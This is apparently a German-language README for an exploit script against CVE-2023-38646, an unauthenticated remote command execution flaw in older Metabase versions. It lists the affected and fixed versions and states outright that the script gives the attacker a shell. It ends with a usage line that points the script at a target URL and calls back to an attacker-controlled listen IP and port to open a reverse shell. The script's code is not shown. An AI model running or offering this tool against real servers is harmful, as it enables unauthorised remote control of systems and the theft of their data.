
Dieses Skript wurde entwickelt, um anfällige Metabase-Softwareversionen auszunutzen und Ihnen als Angreifer eine Shell zu bieten.
Metabase Open Source vor 0.46.6.1 und Metabase Enterprise vor 1.46.6.1 erlauben Angreifern, beliebige Befehle auf dem Server mit den Berechtigungen des Servers auszuführen. Eine Authentifizierung ist für die Ausnutzung nicht erforderlich. Die weiteren behobenen Versionen sind 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2 und 1.43.7.2.
Falls die Metabase-Version angreifbar ist, ermöglicht Ihnen dieses Skript als Angreifer eine Shell-Verbindung zum Zielsystem herzustellen.
python3 CVE-2023-38646.py -u targetURL -lhost LISTEN_IP -lport LISTEN_PORT

Autor: @birdm4nw